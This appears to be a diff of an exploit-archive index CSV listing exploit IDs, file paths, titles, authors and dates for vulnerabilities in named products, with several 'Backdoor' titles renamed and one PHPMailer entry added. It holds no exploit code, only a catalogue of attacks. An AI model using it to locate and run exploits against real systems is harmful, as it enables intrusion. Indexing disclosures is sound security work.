42709,exploits/linux/remote/42709.rb,"Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit)",2017-09-13,"James Fitts",remote,linux,40007
42711,exploits/windows/remote/42711.txt,"Microsoft Windows .NET Framework - Remote Code Execution",2017-09-13,Voulnet,remote,windows,
42719,exploits/windows/remote/42719.rb,"EMC AlphaStor Library Manager < 4.0 build 910 - Opcode 0x4f Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",remote,windows,3500
@ -21320,7 +21320,7 @@ id,file,description,date,author,type,platform,port
8795,exploits/php/webapps/8795.html,"Ultimate Media Script 2.0 - Remote Change Content",2009-05-26,"ThE g0bL!N",webapps,php,
8796,exploits/php/webapps/8796.html,"Gallarific - 'user.php' Arbirary Change Admin Information",2009-05-26,TiGeR-Dz,webapps,php,
8797,exploits/php/webapps/8797.txt,"roomphplanning 1.6 - Multiple Vulnerabilities",2009-05-26,"ThE g0bL!N",webapps,php,
8801,exploits/php/webapps/8801.txt,"Joomla! Component com_rsgallery2 1.14.x/2.x - Remote Backdoor",2009-05-26,"Jan Van Niekerk",webapps,php,
8801,exploits/php/webapps/8801.txt,"Joomla! Component com_rsgallery2 1.14.x/2.x - Remote Backdoor Access",2009-05-26,"Jan Van Niekerk",webapps,php,
8802,exploits/php/webapps/8802.txt,"Kensei Board 2.0.0b - Multiple SQL Injections",2009-05-26,cOndemned,webapps,php,
8803,exploits/php/webapps/8803.txt,"MyForum 1.3 - Authentication Bypass",2009-05-26,"ThE g0bL!N",webapps,php,
8805,exploits/php/webapps/8805.txt,"Flash Image Gallery 1.1 - Arbitrary Configuration File Disclosure",2009-05-26,DarkbiteX,webapps,php,
@ -25268,7 +25268,7 @@ id,file,description,date,author,type,platform,port
17944,exploits/php/webapps/17944.txt,"Joomla! Component Time Returns 2.0 - SQL Injection",2011-10-08,kaMtiEz,webapps,php,
17946,exploits/php/webapps/17946.txt,"NexusPHP 1.5 - SQL Injection",2011-10-08,flyh4t,webapps,php,
17947,exploits/php/webapps/17947.rb,"Snortreport - '/nmap.php' / 'nbtscan.php' Remote Command Execution (Metasploit)",2011-10-09,Metasploit,webapps,php,
17949,exploits/php/webapps/17949.rb,"MyBB 1.6.4 - Backdoor (Metasploit)",2011-10-09,Metasploit,webapps,php,
17949,exploits/php/webapps/17949.rb,"MyBB 1.6.4 - Backdoor Access (Metasploit)",2011-10-09,Metasploit,webapps,php,
17950,exploits/php/webapps/17950.txt,"GotoCode Online Classifieds - Multiple Vulnerabilities",2011-10-09,"Nathaniel Carew",webapps,php,
17951,exploits/php/webapps/17951.txt,"openEngine 2.0 - Multiple Blind SQL Injection Vulnerabilities",2011-10-10,"Stefan Schurtz",webapps,php,
17952,exploits/php/webapps/17952.txt,"KaiBB 2.0.1 - SQL Injection",2011-10-10,"Stefan Schurtz",webapps,php,
@ -35790,7 +35790,7 @@ id,file,description,date,author,type,platform,port
37623,exploits/hardware/webapps/37623.txt,"15 TOTOLINK Router Models - Multiple Remote Code Execution Vulnerabilities",2015-07-16,"Pierre Kim",webapps,hardware,
37624,exploits/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - Cross-Site Request Forgery / Cross-Site Scripting",2015-07-16,"Pierre Kim",webapps,hardware,
37625,exploits/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",webapps,hardware,
37626,exploits/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor / Remote Code Execution",2015-07-16,"Pierre Kim",webapps,hardware,
37626,exploits/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor Access / Remote Code Execution",2015-07-16,"Pierre Kim",webapps,hardware,
37629,exploits/php/webapps/37629.txt,"WordPress Plugin BuddyPress Activity Plus 1.5 - Cross-Site Request Forgery",2015-07-17,"Tom Adams",webapps,php,80
37630,exploits/php/webapps/37630.txt,"Hotel Booking Portal 0.1 - Multiple SQL Injections / Cross-Site Scripting",2012-08-09,"Yakir Wizman",webapps,php,
37632,exploits/php/webapps/37632.txt,"Total Shop UK eCommerce CodeIgniter - Multiple Cross-Site Scripting Vulnerabilities",2012-08-13,"Chris Cooper",webapps,php,
@ -38250,6 +38250,7 @@ id,file,description,date,author,type,platform,port
43052,exploits/php/webapps/43052.txt,"FS Realtor Clone - 'id' SQL Injection",2017-10-24,8bitsec,webapps,php,
43053,exploits/nodejs/webapps/43053.txt,"KeystoneJS 4.0.0-beta.5 - CSV Excel Macro Injection",2017-10-25,"Ishaq Mohammed",webapps,nodejs,
43054,exploits/nodejs/webapps/43054.txt,"KeystoneJS 4.0.0-beta.5 - Cross-Site Scripting",2017-10-25,"Ishaq Mohammed",webapps,nodejs,
43056,exploits/php/webapps/43056.py,"PHPMailer < 5.2.21 - Local File Disclosure",2017-10-25,"Maciek Krupa",webapps,php,
43062,exploits/php/webapps/43062.txt,"PHP Melody 2.6.1 - SQL Injection",2017-10-28,"Venkat Rajgor",webapps,php,
43063,exploits/php/webapps/43063.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (3)",2017-10-28,"Nikhil Mittal",webapps,php,
43064,exploits/php/webapps/43064.txt,"phpMyFAQ 2.9.8 - Cross-Site Request Forgery",2017-10-27,"Nikhil Mittal",webapps,php,

Can't render this file because it is too large.